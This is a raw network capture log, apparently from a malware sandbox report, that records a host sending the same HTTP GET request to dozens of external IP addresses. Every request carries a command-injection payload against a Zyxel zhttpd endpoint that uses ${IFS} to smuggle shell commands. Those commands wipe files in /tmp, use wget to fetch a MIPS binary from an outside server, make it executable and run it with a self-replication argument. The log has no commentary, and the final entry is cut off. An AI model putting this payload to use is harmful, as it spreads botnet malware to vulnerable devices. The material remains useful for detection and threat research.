                                          Jan 14, 2024 15:46:09.844423056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2756192.168.2.233676027.91.146.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844454050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2757192.168.2.2347862113.221.151.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844472885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2758192.168.2.2356932221.160.125.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844507933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2759192.168.2.234817873.112.96.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844508886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2760192.168.2.2345476202.35.28.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844568014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2761192.168.2.2338726155.188.27.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844599009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2762192.168.2.2333830199.223.4.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844599962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2763192.168.2.2353584216.57.196.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844613075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2764192.168.2.2345046187.106.229.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844659090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2765192.168.2.235578275.141.15.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844697952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2766192.168.2.2346704102.10.26.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844712019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2767192.168.2.2347390194.164.99.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844742060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2768192.168.2.2357840163.251.10.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844744921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2769192.168.2.234785225.195.215.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844768047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2770192.168.2.235587025.92.131.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844769955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2771192.168.2.234254875.152.52.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844835043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2772192.168.2.2349210172.63.92.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844845057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2773192.168.2.2358328210.198.116.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844877005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2774192.168.2.2345190125.218.160.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844933033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2775192.168.2.233336468.69.27.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844952106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2776192.168.2.2345208153.167.214.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844965935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2777192.168.2.2345756143.105.203.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844990969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2778192.168.2.2334014136.104.246.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845025063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2779192.168.2.2338678112.139.44.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845051050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2780192.168.2.2346512114.52.36.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845067024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2781192.168.2.2333754211.151.86.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845092058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2782192.168.2.2355300135.213.10.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845096111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2783192.168.2.2336052192.50.31.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845135927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2784192.168.2.2342666204.156.5.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845150948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2785192.168.2.2346114207.147.225.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845177889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2786192.168.2.2359888109.16.164.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845189095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2787192.168.2.233890866.5.62.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845208883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2788192.168.2.2352252123.63.147.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845216990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2789192.168.2.235954480.102.64.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845269918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2790192.168.2.2345638132.196.253.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845297098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2791192.168.2.235948666.254.25.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845319986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2792192.168.2.2337008138.240.239.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845326900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2793192.168.2.2359308158.97.171.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845349073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2794192.168.2.2343498128.117.37.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845392942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2795192.168.2.2334426134.246.98.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845408916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2796192.168.2.2360666221.239.112.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845422029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2797192.168.2.2339066113.74.191.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845453024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2798192.168.2.2353868213.73.139.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845487118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2799192.168.2.236038057.58.37.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845500946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2800192.168.2.233387841.182.190.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845526934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2801192.168.2.234976677.124.39.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845557928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2802192.168.2.234300617.82.143.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845599890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2803192.168.2.233781420.109.163.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845632076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2804192.168.2.2355680167.213.187.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845659018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2805192.168.2.2360556108.193.232.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845660925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2806192.168.2.23334788.0.155.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845704079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2807192.168.2.234145253.211.34.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845722914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2808192.168.2.2345168217.99.241.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845767975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2809192.168.2.235640473.138.139.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845783949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2810192.168.2.2345980122.170.211.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845799923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2811192.168.2.2360930153.144.186.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845885038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2812192.168.2.2340678118.189.5.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845923901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2813192.168.2.2340836135.143.34.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845926046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2814192.168.2.2337460166.96.51.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845952988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2815192.168.2.234709462.91.55.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.845967054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2816192.168.2.2357142220.77.183.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846005917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2817192.168.2.2340676128.170.196.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.846031904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2818192.168.2.2332768176.45.51.149443
                                          TimestampBytes transferredDirectionData
